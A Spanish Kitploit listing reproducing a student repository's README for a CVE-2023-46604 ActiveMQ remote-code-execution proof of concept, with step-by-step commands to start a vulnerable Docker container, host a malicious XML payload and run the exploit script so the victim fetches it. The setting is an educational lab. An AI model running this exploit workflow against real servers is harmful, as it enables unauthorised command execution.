Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SSP-Assignment-3-RCEYouLater — Un PoC para CVE-2023-46604 escrito como parte de la clase SPS para la maestría en Ciberseguridad Avanzada en la UPB. | Kitploit
Herramientas/GitHubGitHub/rockydesigne/ssp-assignment-3-rceyoulater
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubrockydesigne/ssp-assignment-3-rceyoulater

SSP-Assignment-3-RCEYouLater

Un PoC para CVE-2023-46604 escrito como parte de la clase SPS para la maestría en Ciberseguridad Avanzada en la UPB.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
22hace 8 mesesAún no revisado
Compartir

CVE-2023-46604: Prueba de Concepto de RCE en Apache ActiveMQ

Asignación: SSP Assignment 3 Equipo: RCE You Later Miembros: Banica Horia Alexandru, Comarlau Vlad-Constantin

Enlace de video del uso del repositorio para realizar la PoC: https://www.youtube.com/watch?v=vum4qTF4ygU

🚨 Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) totalmente funcional para CVE-2023-46604. Esta vulnerabilidad permite a un atacante ejecutar comandos de shell arbitrarios en un servidor Apache ActiveMQ vulnerable (versión 5.15.10) forzándolo a deserializar un archivo de configuración XML malicioso.

Objetivo: Crear un archivo llamado pwned_by_ssp_team dentro del servidor víctima para demostrar que tenemos control.


🛠️ Requisitos previos

Antes de ejecutar el exploit, asegúrate de tener:

  1. Docker y Docker Compose (instalados y ejecutándose)
  2. Python 3

📂 Estructura del repositorio

  • vulnerable-env/: Contiene la configuración de Docker para el servidor víctima.
  • attacker/: Contiene los scripts de explotación y las cargas útiles maliciosas.
    • exploit.py: El script de Python que envía el paquete malicioso.
    • serve.py: Un servidor HTTP simple para alojar la carga útil XML.
    • poc.xml: El archivo de configuración malicioso que contiene el comando touch /tmp/pwned_by_ssp_team.

  • 🚀 Guía de uso paso a paso

    Paso 1: Iniciar la víctima (ActiveMQ)

    Ejecutaremos una versión antigua y vulnerable de ActiveMQ usando Docker.

    1. Abre una terminal.
    2. Navega a la carpeta vulnerable-env:
      root@kitploit:~
      cd vulnerable-env
      
    3. Inicia el contenedor:
      root@kitploit:~
      docker-compose up -d
      
    4. Espera 30 segundos para que el servidor se inicie por completo.

    Paso 2: Alojar el XML malicioso

    El servidor víctima necesita descargar instrucciones de nosotros. Configuraremos un pequeño servidor web para alojar estas instrucciones.

    1. Abre una segunda terminal.
    2. Navega a la carpeta attacker:
      root@kitploit:~
      cd attacker
      
    3. Inicia el servidor web de Python:
      root@kitploit:~
      python3 serve.py
      
      ¡Mantén esta terminal abierta! Deberías ver "Serving HTTP on 0.0.0.0 port 8000..."

    Paso 3: Ejecutar el exploit

    Ahora enviamos el paquete de red específico que desencadena la vulnerabilidad.

    1. Abre una tercera terminal.

    2. Navega a la carpeta attacker:

      root@kitploit:~
      cd attacker
      
    3. Ejecuta el script de explotación.

      • Nota: Si estás en macOS o Windows, usa el comando a continuación exactamente como está escrito.
      root@kitploit:~
      python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
      
      • Usuarios de Linux: Si estás en Linux, reemplaza host.docker.internal con la puerta de enlace del puente de red, generalmente: 172.17.0.1. Intenta obtener la dirección de esta manera si la prescrita no funciona: docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'

    Paso 4: Verificar el ataque

    ¿Funcionó? Vamos a comprobar si el archivo fue creado dentro del contenedor.

    1. Vuelve a tu primera terminal (o cualquier terminal).
    2. Ejecuta este comando para verificar la carpeta /tmp dentro de la víctima:
      root@kitploit:~
      docker exec activemq-victim ls -l /tmp
      
    3. Éxito: Deberías ver un archivo llamado pwned_by_ssp_team.

    🧹 Limpieza

    Para detener y eliminar el contenedor vulnerable:

    root@kitploit:~
    cd vulnerable-env
    docker-compose down
    
    Descargar herramienta